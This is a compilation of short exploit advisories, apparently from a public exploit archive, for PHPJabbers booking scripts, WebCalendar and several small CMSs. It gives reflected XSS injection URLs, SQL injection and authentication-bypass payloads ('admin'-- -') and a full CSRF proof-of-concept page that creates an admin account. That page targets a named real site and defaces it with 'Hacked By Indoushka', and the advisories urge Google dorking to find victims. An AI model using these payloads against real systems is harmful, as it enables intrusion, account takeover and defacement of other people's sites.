<pre><code># Exploit Title: PHPJabbers Cleaning Business 1.0 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 21/07/2023<br /># Vendor: PHPJabbers<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/cleaning-business-software/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /># CVE: CVE-2023-4115<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br /><br />Path: /index.php<br /><br />GET parameter 'index' is vulnerable to RXSS<br /><br />https://website/index.php?controller=pjFront&action=pjActionServices&locale=1&index=[XSS]<br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WebCalendar v1.3 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://github.com/craigk5n/webcalendar/archive/master.zip | <br />| # Dork : WebCalendar v1.3 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code create a new admin .<br /><br />[+] Go to the line 173.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : install/index.php.<br /><br />[+] http://127.0.0.1/q7.3/admin/settings.php.<br /><br />[+] save code as poc.html .<br /><br />[+] <?xml version="1.0" encoding="UTF-8"?><br /><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"<br /> "DTD/xhtml1-transitional.dtd"><br /><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><br /> <head><br /> <title>WebCalendar Setup Wizard</title><br /> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><br /> <script><br /><!-- <![CDATA[<br /> var xlate = [];<br /> xlate['invalidColor'] = 'Invalid Color';<br /><br /> function testPHPInfo() {<br /> var url = "index.php?action=phpinfo";<br /><br /> window.open( url, 'wcTestPHPInfo', 'width=800,height=600,resizable=yes,scrollbars=yes' );<br /> }<br /> function validate( form ) {<br /> // Only check to make sure single-user login is specified<br /> // if in single-user mode.<br /> var<br /> err = '',<br /> form = document.form_app_settings,<br /> listid = 0; // Find id of single user object.<br /><br /> for( i = 0; i < form.form_user_inc.length; i++ ) {<br /> if( form.form_user_inc.options[i].value == 'none' )<br /> listid = i;<br /> }<br /> if( form.form_user_inc.options[listid].selected ) {<br /> if( form.form_single_user_login.value.length == 0 ) {<br /> // No single user login specified.<br /> alert( 'Error: You must specify a\nSingle-User Login.' );<br /> form.form_single_user_login.focus();<br /> return false;<br /> }<br /> }<br /> if( form.form_server_url.value == '' ) {<br /> err += "Server URL is required.\n";<br /> form.form_server_url.select();<br /> form.form_server_url.focus();<br /> }<br /> else if( form.form_server_url.value.charAt(<br /> form.form_server_url.value.length - 1 ) != '/' ) {<br /> err += "Server URL must end with a slash(/).\n";<br /> form.form_server_url.select();<br /> form.form_server_url.focus();<br /> }<br /> if( err != '' ) {<br /> alert( "Error:\n\n" + err );<br /> return false;<br /> }<br /> // Submit form...<br /> form.submit();<br /> }<br /> function auth_handler() {<br /> var<br /> form = document.form_app_settings,<br /> listid = 0; // Find id of single user object.<br /> for( i = 0; i < form.form_user_inc.length; i++ ) {<br /> if( form.form_user_inc.options[i].value == 'none' )<br /> listid = i;<br /> }<br /> if( form.form_user_inc.options[listid].selected ) {<br /> makeVisible( 'singleuser' );<br /> } else {<br /> makeInvisible( 'singleuser' );<br /> }<br /> }<br /> function db_type_handler() {<br /> var<br /> form = document.dbform,<br /> listid = 0,<br /> selectvalue = form.form_db_type.value;<br /><br /> if( selectvalue == 'sqlite' || $db_type == 'sqlite3'<br /> || selectvalue == 'ibase' ) {<br /> form.form_db_database.size = 65;<br /> document.getElementById( 'db_name' ).innerHTML = 'Database Name: Full Path (no backslashes)';<br /> } else {<br /> form.form_db_database.size = 20;<br /> document.getElementById( 'db_name' ).innerHTML = 'Database Name: ';<br /> }<br /> }<br /> function chkPassword() {<br /> var<br /> form = document.dbform,<br /> db_pass = form.form_db_password.value,<br /> illegalChars = /\#/;<br /> // Do not allow #.../\#/ would stop all non-alphanumeric.<br /><br /> if( illegalChars.test( db_pass ) ) {<br /> alert( 'The password contains illegal characters.' );<br /> form.form_db_password.select();<br /> form.form_db_password.focus();<br /> return false;<br /> }<br /> }<br />//]]> --><br /> </script><br /> <script src="../includes/js/visible.js"></script><br /> <style><br /> body {<br /> margin:0;<br /> background:#fff;<br /> font-family:Arial, Helvetica, sans-serif;<br /> }<br /> table {<br /> border:0;<br /> }<br /> th.header,<br /> th.pageheader,<br /> th.redheader {<br /> background:#eee;<br /> }<br /> th.pageheader {<br /> padding:10px;<br /> font-size:18px;<br /> }<br /> th.header,<br /> th.redheader {<br /> font-size:14px;<br /> }<br /> th.redheader,<br /> .notrecommended {<br /> color:red;<br /> }<br /> td {<br /> padding:5px;<br /> }<br /> td.prompt,<br /> td.subprompt {<br /> padding-right:20px;<br /> font-weight:bold;<br /> }<br /> td.subprompt {<br /> font-size:12px;<br /> }<br /> div.nav {<br /> margin:0;<br /> border-bottom:1px solid #000;<br /> }<br /> div.main {<br /> margin:10px;<br /> }<br /> li {<br /> margin-top:10px;<br /> }<br /> doc.li {<br /> margin-top:5px;<br /> }<br /> .recommended {<br /> color:green;<br /> }<br /> </style><br /> </head><br /> <body onload="auth_handler();"><br /> <table border="1" width="90%" class="aligncenter"><br /> <th class="pageheader" colspan="2">WebCalendar Installation Wizard Step 4</th><br /> <tr><br /> <td colspan="2" width="50%">This is the final step in setting up your WebCalendar Installation.</td><br /> </tr><br /> <th class="header" colspan="2">Application Settings</th><br /> <tr><br /> <td colspan="2"><br /> <ul><li>HTTP-based authentication was not detected. You will need to reconfigure your web server if you wish to select 'Web Server' from the 'User Authentication' choices below.</li></ul><br /> </td><br /> </tr><br /> <tr><br /> <td><br /> <table width="75%" class="aligncenter"><br /> <tr><br /> <form action="http://phase.ups-tlse.fr/webcalendar/install/index.php?action=switch&page=4" method="post" enctype='multipart/form-data' name="form_app_settings"><br /> <input type="hidden" name="app_settings" value="1" /><br /> <td class="prompt">Create Default Admin Account:</td><br /> <td><br /> <input type="checkbox" name="load_admin" value="Yes" /><br /> <span class="notrecommended"> (Admin Account Not Found)</span><br /> </td><br /> </tr><br /> <tr><br /> <td class="prompt">Application Name:</td><br /> <td><input type="text" size="40" name="form_application_name" id="form_application_name" value="Hacked By Indoushka" /></td><br /> </tr><br /> <tr><br /> <td class="prompt">Server URL:</td><br /> <td><input type="text" size="40" name="form_server_url" id="form_server_url" value="http://phase.ups-tlse.fr/webcalendar/" /></td><br /> </tr><br /> <tr><br /> <td class="prompt">User Authentication:</td><br /> <td><br /> <select name="form_user_inc" onChange="auth_handler()"><br /> <option value="user.php" selected="selected">Web-based via WebCalendar (default)</option><br /> <option value="http">Web Server (not detected)</option><br /> <option value="user-imap.php">IMAP</option><br /> <option value="none" >None (Single-User)</option><br /> </select><br /> </td><br /> </tr><br /> <tr id="singleuser"><br /> <td class="prompt">&nbsp;&nbsp;&nbsp;Single-User Login:</td><br /> <td><input name="form_single_user_login" size="20" value="" /></td><br /> </tr><br /> <tr><br /> <td class="prompt">Read-Only:</td><br /> <td><br /> <input name="form_readonly" value="true" type="radio" />Yes&nbsp;&nbsp;&nbsp;&nbsp;<br /> <input name="form_readonly" value="false" type="radio" checked="checked" />No<br /> </td><br /> </tr><br /> <tr><br /> <td class="prompt">Environment:</td><br /> <td><br /> <select name="form_mode"><br /> <option value="prod" selected="selected">Production</option><br /> <option value="dev">Development</option><br /> </select><br /> </td><br /> </tr><br /> </table><br /> </td><br /> </tr><br /> </table><br /> <table width="80%" class="aligncenter"><br /> <tr><br /> <td class="aligncenter"><br /> <input name="action" type="button" value="Save Settings" onClick="return validate();" /><br /> <input type="button" value="Logout" onclick="document.location.href='index.php?action=logout'" /><br /> </form><br /> </td><br /> </tr><br /> </table> </body><br /></html><br /><br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WebCoder CMS v1.0 Sql Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://codecanyon.net/item/webcoder-fully-customizable-cms/22745929 | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] use payload : /%5c/faq<br /><br />[+] https://cmswebcoderaz/%5c/faq<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WebCom CMS v1.0 Auth By pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : https://codecanyon.net/ |<br />| # Dork : "Powered by Web.Com(India) Pvt. Ltd" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : user : admin'-- - & Pass : indoushka<br /><br />[+] http://winternationalhospcom/admin/<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Night Club Booking 1.0 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 21/07/2023<br /># Vendor: PHPJabbers<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/night-club-booking-software/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /># CVE: CVE-2023-4114<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br /><br />Path: /index.php<br /><br />GET parameter 'index' is vulnerable to RXSS<br /><br />https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Service Booking Script 1.0 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 21/07/2023<br /># Vendor: PHPJabbers<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/service-booking-script/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /># CVE: CVE-2023-4113<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br /><br />Path: /index.php<br /><br />GET parameter 'index' is vulnerable to RXSS<br /><br />https://website/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=[XSS]<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 20/07/2023<br /># Vendor: PHPJabbers<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/shuttle-booking-software/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /># CVE: CVE-2023-4112<br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br /><br />Path: /index.php<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/index.php/gm5rj"><script>alert(1)</script>bwude?controller=pjAdmin&action=pjActionLogin&err=1<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WebIncorp CMS v1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) | <br />| # Vendor : http://www.webincorp.com/ | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : /product_detail.php?prod_id=132'"><svg/onload=prompt(1337);><br /><br />[+] https://wfutureqatarqa/product_detail.php?prod_id=132%27%22%3E%3Csvg/onload=prompt(1337);%3E<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Bus Reservation System 1.1 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 20/07/2023<br /># Vendor: PHPJabbers<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/bus-reservation-system/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /># CVE: CVE-2023-4111<br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br /><br />Path: /index.php<br /><br />GET parameter 'index' is vulnerable to RXSS<br /><br />https://website/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&hide=0&index=[XSS]&session_id=<br /><br />Path: /index.php<br /><br />GET parameter 'pickup_id' is vulnerable to RXSS<br /><br />https://website/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=[XSS]&session_id=<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Availability Booking Calendar 5.0 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 20/07/2023<br /># Vendor: PHPJabbers<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/availability-booking-calendar/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /># CVE: CVE-2023-4110<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br /><br />Path: /index.php<br /><br />GET parameter 'session_id' is vulnerable to RXSS<br /><br />https://website/index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=[XSS]&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0<br /><br /><br /><br />[-] Done<br /></code></pre>
